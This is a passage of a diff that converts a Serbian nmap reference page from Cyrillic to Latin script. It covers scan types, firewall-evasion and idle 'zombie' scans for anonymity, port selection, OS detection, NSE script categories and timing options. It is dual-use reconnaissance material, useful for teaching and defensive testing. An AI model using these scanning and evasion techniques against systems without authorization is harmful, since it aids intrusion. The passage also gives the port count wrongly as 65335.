dozvoljavaju ovo i stoga je od malo praktične koristi. +* **`-sS`**: Ne završava vezu tako da ne ostavlja trag, veoma dobro ako se može koristiti (privilegije). To je podrazumevano korišćeno. +* **`-sT`**: Završava vezu, pa ostavlja trag, ali se može koristiti sigurno. Podrazumevano bez privilegija. +* **`-sU`**: Sporije, za UDP. Najčešće: DNS(53), SNMP(161,162), DHCP(67 i 68), (-sU53,161,162,67,68): otvoren(odgovor), zatvoren(nedostupan port), filtriran(drugi ICMP), otvoren/filtriran (ništa). U slučaju otvoren/filtriran, -sV šalje brojne zahteve kako bi otkrio bilo koju od verzija koje nmap podržava i može otkriti pravo stanje. Značajno povećava vreme. +* **`-sY`**: SCTP protokol ne uspeva da uspostavi vezu, pa nema zapisa, radi kao -PY +* **`-sN,-sX,-sF`:** Null, Fin, Xmas, mogu proći kroz neke firewalle i izvući informacije. Bazirane su na činjenici da bi standardno usklađene mašine trebalo da odgovore sa RST na sve zahteve koji nemaju SYN, RST ili ACK oznake podignute: otvoren/filtriran(ništa), zatvoren(RST), filtriran (ICMP nedostupan). Nepouzdane na Windows-u, CIsco-u, BSDI i OS/400. Na unix-u da. +* **`-sM`**: Maimon sken: Šalje FIN i ACK zastave, korišćeno za BSD, trenutno će sve vratiti kao zatvoreno. +* **`-sA, sW`**: ACK i Prozor, koristi se za otkrivanje firewalla, da se zna da li su portovi filtrirani ili ne. -sW razlikuje između otvorenih/zatvorenih jer otvoreni odgovaraju sa različitom vrednošću prozora: otvoren (RST sa prozorom različitim od 0), zatvoren (RST prozor = 0), filtriran (ICMP nedostupan ili ništa). Ne svi računari rade na ovaj način, pa ako su svi zatvoreni, ne radi, ako su neki otvoreni, radi dobro, a ako su mnogi otvoreni i malo zatvoreni, radi obrnuto. +* **`-sI`:** Idle sken. Za slučajeve kada postoji aktivan firewall, ali znamo da ne filtrira određenu IP adresu (ili kada jednostavno želimo anonimnost) možemo koristiti zombie skener (radi za sve portove), da bismo pronašli moguće zombije možemo koristiti skriptu ipidseq ili eksploataciju auxiliary/scanner/ip/ipidseq. Ovaj skener se zasniva na broju IPID paketa IP adrese. +* **`--badsum`:** Šalje pogrešan zbir, računari bi odbacili pakete, ali firewalli bi mogli odgovoriti nečim, koristi se za otkrivanje firewalla. +* **`-sZ`:** "Čudan" SCTP skener, prilikom slanja proba sa fragmentima cookie eha, trebalo bi ih odbaciti ako su otvoreni ili odgovoriti sa ABORT ako su zatvoreni. Može proći kroz firewalle kroz koje init ne može proći, loša stvar je što ne razlikuje između filtriranih i otvorenih. +* **`-sO`:** Skeniranje protokola IP. Šalje loša i prazna zaglavlja u kojima se ponekad čak ne može razlikovati ni protokol. Ako stigne ICMP nedostupan protokol, zatvoren je, ako stigne nedostupan port, otvoren je, ako stigne druga greška, filtriran je, ako ništa ne stigne, otvoren|filtriran. +* **`-b `:** FTPhost--> Koristi se za skeniranje hosta sa drugog, to se radi povezivanjem ftp-a druge mašine i traženjem da pošalje fajlove na portove koje želite skenirati sa druge mašine, prema odgovorima saznaćemo da li su otvoreni ili ne. \[\:\@]\\[:\] Skoro svi ftp serveri više ne dozvoljavaju ovo i stoga je od malo praktične koristi. -### **Analiza portova** +### **Centriranje analize** -**-p:** Koristi se za određivanje portova za skeniranje. Za odabir svih 65335: **-p-** ili **-p sve**. Nmap ima internu klasifikaciju prema popularnosti. Podrazumevano koristi prvih 1000. Sa **-F** (brzo skeniranje) analizira prvih 100. Sa **--top-ports \** Analizira taj broj glavnih portova (od 1 do 65335). Proverava portove u slučajnom redosledu, da se to ne bi dogodilo **-r**. Takođe možemo odabrati portove: 20-30,80,443,1024- Ovo poslednje znači da gleda portove od 1024 nadalje. Takođe možemo grupisati portove po protokolima: U:53,T:21-25,80,139,S:9. Takođe možemo odabrati opseg unutar popularnih nmap portova: -p \[-1024] analizira do 1024 uključenih u nmap-servise. **--port-ratio \** Analizira najčešće korištene portove sa odnosom koji treba biti između 0 i 1 +**-p:** Koristi se za određivanje portova za skeniranje. Za odabir svih 65335: **-p-** ili **-p all**. Nmap ima internu klasifikaciju prema popularnosti. Podrazumevano koristi prvih 1000. Sa **-F** (brzo skeniranje) analizira prvih 100. Sa **--top-ports \** Analizira taj broj glavnih (od 1 do 65335). Proverava portove u slučajnom redosledu, da se to ne bi desilo **-r**. Takođe možemo odabrati portove: 20-30,80,443,1024- Ovo poslednje znači da gleda od 1024 nadalje. Takođe možemo grupisati portove po protokolima: U:53,T:21-25,80,139,S:9. Takođe možemo izabrati opseg unutar popularnih nmap portova: -p \[-1024] analizira do 1024 uključenih u nmap-services. **--port-ratio \** Analizira najčešće portove sa odnosom koji treba biti između 0 i 1 **-sV** Skeniranje verzije, može se podešavati intenzitet od 0 do 9, podrazumevano 7. -**--intenzitet-verzije \** Reguliše intenzitet, tako da što je niži, samo će poslati najverovatnije sonde, ali ne sve. Sa ovim možemo značajno skratiti vreme skeniranja UDP +**--version-intensity \** Podešavamo intenzitet, tako da što je niži, lansira samo najverovatnije sonde, ali ne sve. Time možemo značajno skratiti vreme skeniranja UDP -**-O** Detekcija OS-a +**-O** Detekcija OS -**--osscan-limit** Da bi dobro skenirao host, potrebno je da postoji barem jedan otvoren i jedan zatvoren port, ako se ovo ne dogodi i postavili smo ovo, neće pokušati predvideti OS (štedi vreme) -**--osscan-guess** Када детекција оперативног система није савршена, ово наставља са више напора +**--osscan-limit** Da bi dobro skenirao host, potrebno je da postoji barem jedan otvoren i jedan zatvoren port, ako se ovo ne dogodi i postavili smo ovo, ne pokušava predviđanje OS (štedi vreme) +**--osscan-guess** Kada detekcija operativnog sistema nije savršena, ovaj parametar povećava napor -**Сценарији** +**Skripte** -\--script _\_|_\_|_\_|_\_\[,...] +\--script _\_|_\_|_\_|_\_\[,...] -За коришћење подразумеваних, довољно је користити -sC или --script=default +Za korišćenje podrazumevanih skripti, dovoljno je koristiti -sC ili --script=default -Врсте укључују: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln +Tipovi skripti uključuju: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version i vuln -* **Auth:** извршава све доступне сценарије за аутентификацију -* **Default:** извршава основне подразумеване сценарије алатке -* **Discovery:** прикупља информације о мети или жртви -* **External:** сценариј за коришћење спољних ресурса -* **Intrusive:** користи сценарије који се сматрају интрузивним за жртву или мету -* **Malware:** проверава да ли постоје отворене везе од злонамерних кодова или задњих врата -* **Safe:** извршава сценарије који нису интрузивни -* **Vuln:** открива најпознатије ранљивости -* **All:** извршава све сценарије са NSE екстензијом +* **Auth:** izvršava sve dostupne skripte za autentikaciju +* **Default:** izvršava osnovne podrazumevane skripte alata +* **Discovery:** prikuplja informacije o meti ili žrtvi +* **External:** skripta za korišćenje spoljnih resursa +* **Intrusive:** koristi skripte koje se smatraju napadnim za žrtvu ili metu +* **Malware:** proverava da li postoje otvorene veze putem zlonamernih kodova ili vrata za povratni pristup (backdoors) +* **Safe:** izvršava skripte koje nisu napadne +* **Vuln:** otkriva najpoznatije ranjivosti +* **All:** izvršava apsolutno sve dostupne NSE skripte -За претрагу сценарија: +Za pretragu skripti: -**nmap --script-help="http-\*" -> Они који почињу са http-** +**nmap --script-help="http-\*" -> One koje počinju sa http-** -**nmap --script-help="not intrusive" -> Сви осим тих** +**nmap --script-help="not intrusive" -> Sve osim tih** -**nmap --script-help="default or safe" -> Они који су у једном или другом или оба** +**nmap --script-help="default or safe" -> One koje su u jednoj ili drugoj kategoriji ili u obema** -**nmap --script-help="default and safe" --> Они који су у оба** +**nmap --script-help="default and safe" --> One koje su u obema** **nmap --script-help="(default or safe or intrusive) and not http-\*"** \--script-args _\_=_\_,_\_={_\_=_\_},_\_={_\_,_\_} -\--script-args-file _\_ +\--script-args-file _\_ -\--script-help _\_|_\_|_\_|_\_|all\[,...] +\--script-help _\_|_\_|_\_|_\_|all\[,...] -\--script-trace ---> Даје информације о току сценарија +\--script-trace ---> Pruža informacije o toku skripte \--script-updatedb -**За коришћење сценарија само треба унети: namp --script Име\_сценарија циљ** --> Уношењем сценарија извршаваће се и сценариј и скенер, тако да се могу додати опције скенера, можемо додати **“safe=1”** да би се извршавали само безбедни сценарији. +**Za korišćenje jedne skripte, dovoljno je navesti: nmap --script Ime\_skripte cilj** --> Navođenjem skripte, izvršiće se i skripta i skener, tako da se mogu dodati opcije skenera, možemo dodati **“safe=1”** da bi se izvršile samo sigurne skripte. -**Контрола времена** +**Kontrola vremena** -**Nmap може модификовати време у секундама, минутама, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m сви раде исту ствар. +**Nmap može modifikovati vreme u sekundama, minutima, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m sve rade isto. -Nmap дели укупан број хостова за скенирање у групе и анализира те групе у блоковима тако да док се сви не анализирају, не прелази на следећи блок (и корисник такође не добија никакво ажурирање док се блок не анализира) на овај начин, за Nmap је оптималније користити велике групе. Подразумевано за класу C користи 256. +Nmap deli ukupan broj hostova za skeniranje u grupe i analizira te grupe u blokovima tako da dok se ne analiziraju svi, ne prelazi na sledeći blok (i korisnik takođe ne dobija ažuriranja dok se blok ne analizira), na ovaj način, nmap je efikasniji koristeći veće grupe. Podrazumevano za klasu C koristi 256. -Може се променити са\*\*--min-hostgroup\*\* _**\**_**;** **--max-hostgroup** _**\**_ (Прилагодите паралелне величине група скенирања) +Može se promeniti sa\*\*--min-hostgroup\*\* _**\**_**;** **--max-hostgroup** _**\**_ (Prilagodi veličine paralelnih sken grupa) -Може се контролисати број паралелних скенера, али је боље да не (nmpa већ има аутоматску контролу на основу стања мреже): **--min-parallelism** _**\**_**;** **--max-parallelism** _**\**_ +Može se kontrolisati broj skenera paralelno, ali je bolje ne (nmap već ima automatsku kontrolu na osnovu stanja mreže): **--min-parallelism** _**\**_**;** **--max-parallelism** _**\**_ -Можемо променити rtt тајмаут, али обично није потребно: **--min-rtt-timeout** _**\